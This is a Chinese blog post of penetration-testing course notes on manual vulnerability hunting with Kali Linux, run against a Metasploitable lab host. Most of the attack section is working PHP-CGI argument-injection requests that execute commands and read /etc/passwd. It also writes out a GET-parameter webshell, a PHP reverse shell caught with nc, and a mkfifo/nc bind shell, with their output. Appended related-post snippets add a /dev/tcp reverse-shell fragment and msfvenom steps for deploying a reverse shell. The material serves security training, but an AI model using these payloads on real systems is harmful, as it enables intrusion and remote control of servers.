Kali Linux渗透测试 085 手动漏洞挖掘-php反弹shell.md

最新推荐文章于 2025-07-16 19:25:32 发布
最新推荐文章于 2025-07-16 19:25:32 发布
阅读量3.3k 收藏 7
点赞数
CC 4.0 BY-SA版权
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kevinhanser/article/details/79644883
本文介绍Kali Linux 2018.1在渗透测试中的应用,涵盖手动漏洞挖掘原则、身份认证漏洞及默认安装漏洞等内容。通过具体案例演示如何利用phpMyAdmin和Ubuntu/Debian默认安装的PHP5-cgi进行攻击。

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 手动漏洞挖掘的原则
2. 漏洞的本质
3. 身份认证漏洞
	3-1. 针对身份认证
	3-2. 会话 SessionID
	3-3. 密码找回时的漏洞
4. 默认安装漏洞
	4-1. phpMyAdminsetup
		4-1-1. 测试 DVWA 的 phpMyAdmin 漏洞
		4-1-2. 写入简单 webshell
		4-1-3. PHP 反弹 shell
	4-2. Ubuntu Debian 默认安装 PHP5-cgi
		4-2-1. 测试漏洞
		4-2-2. 服务器打开侦听端口

手动漏洞挖掘的原则

  • 所有变量

  • 所有头

    Cookie的变量

  • 逐个变量删除

漏洞的本质

  • 数据与指令的混淆
  • 对用户输入信息过滤不严判断失误,误将指令当数据

身份认证漏洞

针对身份认证

  1. 使用常用弱口令/基于字典的密码暴力破解
  2. 测试是否锁定账号
  3. 测试基于手机号的用户名破解,可以在站内论坛收集用户信息
  4. 查看错误秘密提升信息,可以判断用户名或者密码错误
  5. 密码嗅探工具可以直接获取密码

会话 SessionID

  1. Xss / cookie importer
  2. SessionID in URL
  3. 使用嗅探工具.
  4. 测试 SessionID 是否是长期不变的
  5. 破译 SessionID 生成算法
    • Sequencer
    • 私有算法
    • 预判下一次登录时生成的 SessionID
    • 登出后返回测试

密码找回时的漏洞

  1. 在 URL 中存在密码的散列值,可以直接进行密码设置

#默认安装漏洞 #

phpMyAdmin/setup

测试 DVWA 的 phpMyAdmin 漏洞

  1. Burpsuite 测试命令

     POST http://10.10.10.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
 Host: 192.168.20.10

 <?php
 passthru('id');
 die(); #dir()终止后续的显示
 ?>

    在这里插入图片描述

  2. 查看权限

     POST http://10.10.10.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
 Host: 192.168.20.10
 Content-Length: 64
 
 <?php
 passthru('id');
 passthru('cat /etc/passwd');
 die();
 ?>

  3. 查看可以使用的命令

     POST http://10.10.10.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
 Host: 192.168.20.10
 Content-Length: 114
 
 <?php
 passthru('id');
 passthru('cat /etc/passwd');
 passthru('ls');
 passthru('reboot');	#非管理员权限无法重启
 die();
 ?>

  4. 测试写入权限

     POST http://10.10.10.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
 Host: 192.168.20.10
 Content-Length: 114
 
 <?php
 passthru('id');
 passthru('echo "123456789" > a.txt');
 passthru('cat a.txt');
 passthru('ls');
 die();
 ?>

写入简单 webshell

  1. 简单网页木马

     <?php
 \$cmd = \$_GET["cmd"];
 system(\$cmd);
 ?>

  2. 上传木马

     POST http://10.10.10.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
 Host: 192.168.20.10
 Content-Length: 133
 
 <?php
 passthru('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php');
 passthru('cat /var/www/3.php');
 die();
 ?>

  3. 验证此简单木马

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

PHP 反弹 shell

  1. 获取 webshell

     root@kali:~# cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/test.php

  2. 修改要反弹到的主机IP

    在这里插入图片描述

  3. 通过 POST 方法直接将文本内容发给目标服务器

    在这里插入图片描述

  4. 开始监听反弹的端口

     root@kali:~# nc -nvvlp 1234
 listening on [any] 1234 ...

  5. BurpSuite 发送请求,执行木马并反弹

    在这里插入图片描述

  6. 查看 nc 的监听情况

     root@kali:~# nc -nvvlp 1234
 listening on [any] 1234 ...
 connect to [10.10.10.131] from (UNKNOWN) [10.10.10.132] 43856
 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  04:28:00 up  2:57,  2 users,  load average: 0.03, 0.01, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
 msfadmin tty1     -                03Mar18  1:48   0.01s  0.00s /bin/login -- 
 root     pts/0    :0.0             03Mar18 17days  0.00s  0.00s -bash
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 sh: no job control in this shell
 sh-3.2$

  7. 使用 nc 直接进行操作

     sh-3.2$ pwd
 /
 sh-3.2$ cd home
 sh-3.2$ ls
 ftp
 msfadmin
 service
 user
 sh-3.2$ pwd
 /home
 sh-3.2$ netstat -tulnp   
 sh-3.2$ which ifconfig
 sh-3.2$ whereis ifconfig                                          
 ifconfig: /sbin/ifconfig /usr/share/man/man8/ifconfig.8.gz
 sh-3.2$ /sbin/ifconfig
 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d0:ab:2c  
           inet addr:10.10.10.132  Bcast:10.10.10.255  Mask:255.255.255.0
           inet6 addr: fe80::20c:29ff:fed0:ab2c/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:3232 errors:0 dropped:0 overruns:0 frame:0
           TX packets:1065 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:301079 (294.0 KB)  TX bytes:278971 (272.4 KB)
           Base address:0x2000 Memory:fd5c0000-fd5e0000 
 sh-3.2$

Ubuntu / Debian 默认安装 PHP5-cgi

可直接访问 /cgi-bin/php5 和 /cgi-bin/php (爬不出来的目录)

测试漏洞

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 123
Content-Length: 86

<?php
passthru('id');
echo exec('pwd');
echo system('cat /etc/passwd');
die();
?>

服务器打开侦听端口

  1. 服务器打开端口

     POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
 Host: 123
 Content-Length: 86
 
 <?php
 system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');
 die();
 ?>

    在这里插入图片描述

  2. kali 验证 shell

     root@kali:~# nc 10.10.10.132 4444
 ls
 php
 php5
 pwd
 /usr/lib/cgi-bin
 ls /var/www
 3.php
 dav
 dvwa
 index.php
 mutillidae
 phpMyAdmin
 phpinfo.php
 test
 tikiwiki
 tikiwiki-old
 twiki

  3. kali 端口 nc

     root@kali:~# nc 10.10.10.132 4444
 ls /var/www
 3.php
 dav
 dvwa
 index.php
 mutillidae
 phpMyAdmin
 phpinfo.php
 test
 tikiwiki
 tikiwiki-old
 twiki
 exit
 exit
 root@kali:~#

  4. BurpSuite 上显示此次访问结束

    在这里插入图片描述

Kali Linux自带webshell的使用
汗的博客
03-31 7815
大家都比较喜欢用菜刀、蚁剑、冰蝎这类图形化webshell管理工具,但是webshell的知识还是要有的,比如反弹常用的webshell。我简单介绍一下kali自带的反向webshell Kali自带webshell目录: /usr/share/webshells/ 可以看到有asp、aspx、jsp、perl、php等类型webshell 主要谈谈反弹phpwebshellphp-rever...
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1312
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
手动渗透测试漏洞
weixin_34082789的博客
09-18 366
1. 实验环境的叙述性说明   做实验的攻击,以前我已经介绍了一篇文章Kioptrix安装和网络无人驾驶飞机配置。现在看一下虚拟机所需的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑例如以下图所看到的:    2. 列举服务   首先我们使用nmap命令对网络中的机器进行扫描。输入下面命令对192.168.50.0...
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
《metasploit笔记》- 生成木马反弹shell
最新发布
weixin_43875895的博客
07-16 848
windows、linux和Android生成木马反弹shell例子
网络安全工程师教你:Kali Linux之Metasploit渗透测试基础(四)
Kali与编程
09-23 613
本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注!Meta sploit渗透测试框架基础(四) 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 Metasploit提供了大量的模块。所谓模块就是指Met
安装Kali Linux操作系统Kali Linux无线网络渗透
大学霸__IT达人
01-30 3403
安装Kali Linux操作系统Kali Linux无线网络渗透
kaliWEB渗透笔记
fhl5203的博客
11-01 5422
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8745
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1473
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
手动检测网站的SQL注入漏洞
weixin_34408717的博客
10-25 1465
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正...
Web漏洞手动检测分析
花有重开日,人无再少年。
06-09 1515
1、了解常见Web漏洞及攻击原理。 2、了解Burp Suite的基本功能及Proxy功能。
渗透测试笔记】之【手动漏洞挖掘一】
AA8j的博客
07-08 883
WIndows默认安装漏洞 利用php配置漏洞,执行php代码进而执行系统命令 (可利用Burpsuite发送POST) POST http://192.168.2.100/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.100 <?php passthru('id'); die(); ?> ...
渗透测试笔记】之【SQL手动漏洞挖掘
AA8j的博客
07-19 445
判断是否存在SQL注入漏洞 假如网址为http://www.xxx.com/1.php?id=1 基于报错检测 http://www.xxx.com/1.php?id=1' http://www.xxx.com/1.php?id=1" http://www.xxx.com/1.php?id=1% http://www.xxx.com/1.php?id=1( http://www.xxx.com/1.php?id=1) 基于布尔检测 http://www.xxx.com/1.php?id=1' an
php liunx反弹大马,Linux反弹 Shell 方法总结
weixin_33895274的博客
03-12 485
原标题:Linux反弹 Shell 方法总结16004488 所谓反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上。实验环境:CentOS 6.5:192.168.0.3kali2.0:192.168.0.4方法一反弹shell命令如下:bash -i >& /dev/tcp/ip/po...
kali执行php代码的exp,ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell...
weixin_34698515的博客
03-10 783
前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。漏洞分析关键代码:// 获取控制器名$controller = strip_tags($result[1]...
PHP漏洞挖掘思路+实例
weixin_33950035的博客
03-08 802
lxj616 · 2013/12/27 14:09最近研究PHP漏洞挖掘,总结了一些我挖到的漏洞,整理了一下思路,求各路神人补充、批评、指导~本文所有示例均来自我在乌云上已由厂商允许公开的漏洞由于是实例的分析,基础知识请百度,就不全都粘贴到前面了0x01:  搜索所有的用户可控变量(GET/POST/COOKIE/referer)原因:所有用户输入都是有害的,代码审计注重函数和变量,先看看在什么...
分析 PHP大马-php_mof SHELL
weixin_30840253的博客
06-23 759
Part 1 前言   https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。 <?php $password = 'phpinfo';//登录密码 //----------功能程序------------------// $c = "chr"; session_start(); if (empty($_SESSION['Php...
kali中没有php-rever-shell.php
05-14
### 如何在 Kali Linux 中获取或使用 `php-reverse-shell.php` 文件 #### 获取 `php-reverse-shell.php` 文件 在渗透测试过程中,`php-reverse-shell.php` 是一种常用的工具文件,用于实现远程命令执行并返回一个反向 Shell。以下是几种方法可以获取该文件: 1. **从 Metasploit 自带资源中提取** 在 Kali Linux 的默认安装中,Metasploit 已经包含了生成 PHP 反向 Shell 的功能。可以通过以下方式生成所需的脚本: ```bash msfvenom -p php/meterpreter_reverse_tcp LHOST=<你的IP地址> LPORT=<监听端口> -f raw > php-reverse-shell.php ``` 这条命令会生成一个名为 `php-reverse-shell.php` 的文件[^3]。 2. **手动下载官方版本** 如果需要更灵活的配置选项或者不想依赖于 Metasploit 自动生成,则可以从社区维护的仓库中下载标准版的 `php-reverse-shell.php` 脚本。例如: ```bash wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ``` 3. **自定义修改现有模板** 下载后的 `php-reverse-shell.php` 文件通常需要设置攻击者的 IP 地址 (`LHOST`) 和端口号 (`LPORT`) 才能正常工作。打开文件后找到如下字段进行替换: ```php <?php $ip = '<你的IP地址>'; // 攻击者服务器的公网IP $port = <监听端口>; // 设置监听端口 ... ?> ``` #### 使用 `php-reverse-shell.php` 文件 完成上述步骤之后,就可以按照以下流程部署和利用此文件: 1. **上传至目标 Web 应用目录** 将生成好的 `php-reverse-shell.php` 文件上传到目标系统的可访问路径下。这一步可能需要用到 FTP、SCP 或其他文件传输手段[^5]。 2. **启动本地监听程序** 在 Kali 主机上运行 Netcat 或 Socat 来等待来自受害机器上的连接请求: ```bash nc -nvlp <监听端口> ``` 3. **触发恶意脚本执行** 当受害者加载含有嵌入式 PHP Reverse Shell 的页面时,它就会尝试回连指定的目标地址与端口组合。如果一切顺利的话,在终端窗口里应该能看到一个新的交互式的 Shell 提示符出现[^4]。 #### 注意事项 为了提高成功率以及规避潜在风险,请注意以下几点建议: - 确认所使用的 IP 地址为外部可达的有效地址; - 测试期间关闭防火墙规则以免干扰通信链路建立过程; - 对整个操作记录存档以便事后分析总结经验教训; ```python print("Example Python Code Block") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值